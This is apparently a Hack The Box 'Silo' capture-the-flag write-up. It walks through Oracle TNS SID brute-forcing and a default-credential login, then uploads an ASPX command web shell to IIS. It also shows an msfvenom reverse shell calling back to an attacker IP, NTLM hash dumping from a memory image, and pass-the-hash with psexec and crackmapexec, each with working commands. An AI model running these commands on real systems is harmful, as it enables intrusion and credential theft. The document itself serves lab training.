Nmap Results
# Nmap 7.92 scan initiated Sun Aug 21 15:00:32 2022 as: nmap -T5 -p80,135,445,1521,5985,47001,49152,49153,49154,49155,49159,49160,49161,49162 -A -oA scan-all -Pn 10.10.10.82
Nmap scan report for 10.10.10.82
Host is up (0.014s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (96%), Microsoft Windows Server 2012 R2 Update 1 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows Vista SP1 (96%), Microsoft Windows Server 2012 or Server 2012 R2 (95%), Microsoft Windows 7 or Windows Server 2008 R2 (94%), Microsoft Windows Server 2008 SP2 Datacenter Version (94%), Microsoft Windows Server 2008 R2 SP1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 3.0.2:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-08-21T19:02:35
|_ start_date: 2022-08-21T18:59:31
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 12.52 ms 10.10.14.1
2 12.99 ms 10.10.10.82
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 21 15:02:41 2022 -- 1 IP address (1 host up) scanned in 129.39 secondsService Enumeration
TCP/445
Test SMB for anonymous share enumeration.
smbclient -L //$target -U '' --option="client min protocol=core"NT_STATUS_LOGON_FAILURE – going to need a credential to connect to SMB.
TCP/80
Gobuster Enumeration
gobuster dir -u http://$target -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx -t 50 -o gobuster-out -r/aspnet_client (Status: 403) [Size: 1233]TCP/1521
nmap already ran the oracle-tns-version script on the port and fingerprinted it as Oracle TNS Listener 11.2.0.2.0 . I'm not very familiar with this service, but there is a brief overview of testing it here.
1521,1522-1529 - Pentesting Oracle TNS Listener - HackTricks
Looking over the cheat sheet, the methodology for testing Oracle TNS Listener is:
- Get the version number
- Enumerate SIDs
- Test credentials
- Exploit
- Remote Code Execution (RCE)
- Get/Put files (possible RCE by putting a payload in the web root)
- Possible privilege escalation on certain versions
Enumerate SIDs
Download the sids-oracle.txt file provided in the HackTricks cheat sheet. Then, let's use the suggested hydra command – with some modifications added by me – to brute force the SIDs.
hydra -V -L ./sids-oracle.txt -o found-sids.txt -s 1521 10.10.10.82 oracle-sid
cat ./found-sids.txt[1521][oracle-sid] host: 10.10.10.82
[1521][oracle-sid] host: 10.10.10.82 login: CLRExtProc
[1521][oracle-sid] host: 10.10.10.82 login: PLSExtProc
[1521][oracle-sid] host: 10.10.10.82 login: XE
Test Credentials
I tested the offline cracking methodology described here in the cheat sheet. I found that the XE SID is the only SID that would return user hashes. Unfortunately, I don't have a super strong GPU to brute-force hashes and the word list I used was not returning anything valid.
I am going to use the odat tool mentioned in the cheat sheet. A couple dependencies were not installed, so just noting here what I installed:
python3 -m pip install python-libnmap
python3 -m pip install pycryptodomeNow, we can get to work.
./odat.py --help
./odat.py passwordguesser --help
./odat.py passwordguesser -s 10.10.10.82 -p 1521 -d XE --both-ul
Time to Exploit
We've completed all three prerequisites to exploit the target as discussed above:
- Get the version number
- Enumerate SIDs
- Valid SID:
XE
- Valid SID:
- Test credentials
- Valid Credentials:
scott/tiger
- Valid Credentials:
First, let's install the sqlplus client so we can connect to the database and double-check the credential
sudo apt update
sudo apt install -y oracle-instantclient-sqlplus
# Set an environment variable so the sqlplus client
# Can load the shared libraries
export LD_LIBRARY_PATH=/usr/lib/oracle/19.6/client64/lib
# Add the environment variable to .zshrc so that
# It's set every time a shell opens
echo 'export LD_LIBRARY_PATH=/usr/lib/oracle/19.6/client64/lib' >> ~/.zshrcNow, let's try connecting to the database.
sqlplus scott/tiger@10.10.10.82/XE 'as sysdba';
Exploit
Test Web Root Upload
Let's see if we can abuse the IIS web server to upload a shell and gain a foothold. First, let's see if we can upload a test.html file to the web root.
echo '<h1>Hello, world! From 0xBEN</h1>' > test.htmlNow, we'll connect to the database as the administrator using the --sysdba flag and write the test.html file to the web root, C:\inetpub\wwwroot .
./odat.py utlfile --help
./odat.py utlfile -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --putFile 'C:\inetpub\wwwroot' test.html test.html --sysdba
Upload Web Pseudo-shell
I am going to use this code as a template for my pseudo-shell. All credit goes to the author.
Simple ASPX application (vulnerable to OS command injections)
Simple ASPX application (vulnerable to OS command injections) - ping.aspx
262588213843476
Download the code:
wget https://gist.githubusercontent.com/stasinopoulos/95ce3d164fec1d477f80ea3675be2021/raw/b2fdbda6798f015a452df37f792bbc2b99c97b06/ping.aspx -O cmd.aspxNow, I'm going to change this line of code:
Before
psi.Arguments = "/c ping -n 2 " + arg;After
psi.Arguments = "/c " + arg;Now, let's upload the file to the web root.
./odat.py utlfile -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --putFile 'C:\inetpub\wwwroot' cmd.aspx cmd.aspx --sysdba
Transfer a Reverse Shell
I used my pseudo-shell to run systeminfo and find out more about the target operating system. Using our pseudo-shell, let's create a reverse shell payload with msfvenom and transfer it to the target.
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -f exe -a x64 --platform windows -b '\x00' -e x64/xor_dynamic -o 0xBEN_shell.exeNow, we'll start a SMB server to host the file and execute it on the target.
smbserver.py -smb2support evil $PWDsudo rlwrap nc -lnvp 443
Post-Exploit Enumeration
Operating Environment
OS & Kernel
Host Name: SILO
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-00115-23036-AA976
Original Install Date: 12/31/2017, 11:01:23 PM
System Boot Time: 8/28/2022, 1:33:39 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-gb;English (United Kingdom)
Input Locale: en-us;English (United States)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 4,095 MB
Available Physical Memory: 3,086 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,491 MB
Virtual Memory: In Use: 1,308 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 149 Hotfix(s) Installed.
[01]: KB2868626
[02]: KB2883200
[03]: KB2887595
[04]: KB2894852
[05]: KB2903939
[06]: KB2911106
[07]: KB2919355
[08]: KB2919394
[09]: KB2928680
[10]: KB2934520
[11]: KB2938066
[12]: KB2954879
[13]: KB2966826
[14]: KB2966828
[15]: KB2967917
[16]: KB2968296
[17]: KB2972103
[18]: KB2973114
[19]: KB2973351
[20]: KB2989930
[21]: KB3000850
[22]: KB3003057
[23]: KB3004361
[24]: KB3004365
[25]: KB3012702
[26]: KB3013172
[27]: KB3013791
[28]: KB3014442
[29]: KB3019978
[30]: KB3021910
[31]: KB3022777
[32]: KB3023219
[33]: KB3023266
[34]: KB3024751
[35]: KB3024755
[36]: KB3029603
[37]: KB3030377
[38]: KB3030947
[39]: KB3033446
[40]: KB3035126
[41]: KB3036612
[42]: KB3037576
[43]: KB3037924
[44]: KB3038002
[45]: KB3042085
[46]: KB3043812
[47]: KB3044374
[48]: KB3044673
[49]: KB3045634
[50]: KB3045685
[51]: KB3045717
[52]: KB3045719
[53]: KB3045755
[54]: KB3045992
[55]: KB3045999
[56]: KB3046017
[57]: KB3046737
[58]: KB3048043
[59]: KB3054169
[60]: KB3054203
[61]: KB3054256
[62]: KB3054464
[63]: KB3055323
[64]: KB3055343
[65]: KB3055642
[66]: KB3059317
[67]: KB3060681
[68]: KB3060793
[69]: KB3061512
[70]: KB3063843
[71]: KB3071756
[72]: KB3072307
[73]: KB3074228
[74]: KB3074545
[75]: KB3075220
[76]: KB3077715
[77]: KB3078405
[78]: KB3078676
[79]: KB3080042
[80]: KB3080149
[81]: KB3082089
[82]: KB3084135
[83]: KB3086255
[84]: KB3087041
[85]: KB3087137
[86]: KB3091297
[87]: KB3092601
[88]: KB3092627
[89]: KB3094486
[90]: KB3095701
[91]: KB3097992
[92]: KB3099834
[93]: KB3100473
[94]: KB3103616
[95]: KB3103696
[96]: KB3103709
[97]: KB3109103
[98]: KB3109976
[99]: KB3110329
[100]: KB3115224
[101]: KB3121261
[102]: KB3121461
[103]: KB3122651
[104]: KB3123245
[105]: KB3126033
[106]: KB3126434
[107]: KB3126587
[108]: KB3127222
[109]: KB3128650
[110]: KB3133043
[111]: KB3133690
[112]: KB3134179
[113]: KB3134815
[114]: KB3137728
[115]: KB3138602
[116]: KB3139164
[117]: KB3139398
[118]: KB3139914
[119]: KB3140219
[120]: KB3140234
[121]: KB3145384
[122]: KB3145432
[123]: KB3146604
[124]: KB3146723
[125]: KB3146751
[126]: KB3147071
[127]: KB3153704
[128]: KB3155784
[129]: KB3156059
[130]: KB3159398
[131]: KB3161949
[132]: KB3161958
[133]: KB3162343
[134]: KB3169704
[135]: KB3172614
[136]: KB3172729
[137]: KB3173424
[138]: KB3175024
[139]: KB3178539
[140]: KB3179574
[141]: KB3186539
[142]: KB4033369
[143]: KB4033428
[144]: KB4040972
[145]: KB4040974
[146]: KB4040981
[147]: KB4041777
[148]: KB4054854
[149]: KB4054519
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.82
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Current User
User Name SID
========================== =============================================================
iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-82-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Users and Groups
Local Users
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest Phineas
Local Groups
SILO\Access Control Assistance Operators
SILO\Administrators
SILO\Backup Operators
SILO\Certificate Service DCOM Access
SILO\Cryptographic Operators
SILO\Distributed COM Users
SILO\Event Log Readers
SILO\Guests
SILO\Hyper-V Administrators
SILO\IIS_IUSRS
SILO\Network Configuration Operators
SILO\Performance Log Users
SILO\Performance Monitor Users
SILO\Power Users
SILO\Print Operators
SILO\RDS Endpoint Servers
SILO\RDS Management Servers
SILO\RDS Remote Access Servers
SILO\Remote Desktop Users
SILO\Remote Management Users
SILO\Replicator
SILO\Users
SILO\ORA_DBA
SILO\WinRMRemoteWMIUsers__
Network Configurations
Interfaces
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.10.82
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{50CD6E47-E5C7-44A8-B294-BA01E18B9E30}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Open Ports
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 620
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1521 0.0.0.0:0 LISTENING 1212
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 428
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 760
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 828
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 904
TCP 0.0.0.0:49159 0.0.0.0:0 LISTENING 1076
TCP 0.0.0.0:49160 0.0.0.0:0 LISTENING 528
TCP 0.0.0.0:49161 0.0.0.0:0 LISTENING 520
TCP 0.0.0.0:49162 0.0.0.0:0 LISTENING 1804
TCP 10.10.10.82:139 0.0.0.0:0 LISTENING 4
TCP 127.0.0.1:8080 0.0.0.0:0 LISTENING 1212
TCP 127.0.0.1:49156 0.0.0.0:0 LISTENING 1212
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 620
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:1521 [::]:0 LISTENING 1212
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49152 [::]:0 LISTENING 428
TCP [::]:49153 [::]:0 LISTENING 760
TCP [::]:49154 [::]:0 LISTENING 828
TCP [::]:49155 [::]:0 LISTENING 904
TCP [::]:49159 [::]:0 LISTENING 1076
TCP [::]:49160 [::]:0 LISTENING 528
TCP [::]:49161 [::]:0 LISTENING 520
TCP [::]:49162 [::]:0 LISTENING 1804
Interesting Files
C:\Users\Phineas\Desktop\Oracle issue.txt
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):
Dropbox link provided to vendor (and password under separate cover).
Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0
link password:
?%Hm8646uC$
NOTE: The password for the Dropbox file would not work for me, so I had to glance at a walkthrough for answers. Turns out there was an encoding issue causing the £ character to display as ?. The actual password is £%Hm8646uC$
Open the Dropbox link in your browser and enter the supplied password.
Privilege Escalation
We're provided with a SILO-20180105-221806.zip file from Dropbox. If you unzip it, you'll find a memory dump file .DMP that we need to analyze.
Reading the Crash Dump
Download Volatility
Use Linux Standalone executable unzip the archive.
Release Downloads | Volatility Foundation
wget http://downloads.volatilityfoundation.org/releases/2.6/volatility_2.6_lin64_standalone.zip
unzip volatility_2.6_lin64_standalone.zip
cp volatility_2.6_lin64_standalone/volatility_2.6_lin64_standalone ./volatilityAnalyze the Dump File
Using the systeminfo command output from before, we know we're dealing with a Microsoft Windows Server 2012 R2 Standard x64 operating system. This is critical to know, as it will enable Volatility to read the memory artifacts correctly.
# Show help message
./volatility --help
# List profiles (and other info)
./volatility --info
./volatility --info | grep 2012
# This command will take a bit to run
# Dump NTLM hashes from memory
./volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hashdump
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::
Pass the Hash
We'll practice this with a few options:
# pth-winexe
pth-winexe -U 'Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7' //10.10.10.82 cmd.exe
# smbexec.py
smbexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7' 'Administrator@10.10.10.82'
# psexec.py
psexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7' 'Administrator@10.10.10.82' cmd.exe
# CrackMapExec
# Create a payload
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -f exe -a x64 --platform windows -b '\x00' -e x64\xor_dynamic -o 0xBEN_shell.exe
# Host it with SMB server
smbserver.py -smb2support evil $PWD
# Start a listener
sudo rlwrap nc -lnvp 443
# Connect to SMB as the Administrator and run the payload from the SMB server on Kali
crackmapexec smb 10.10.10.82 -u 'Administrator' -H 'aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7' --local-auth -x '\\10.10.14.2\evil\0xBEN_shell.exe'
Flags
C:\Users\Phineas\Desktop\user.txt
d51d472f0450de8c1cdb3e993dc309e6
C:\Users\Administrator\Desktop\root.txt
8643321264a1f5ea49f453ad7a392725
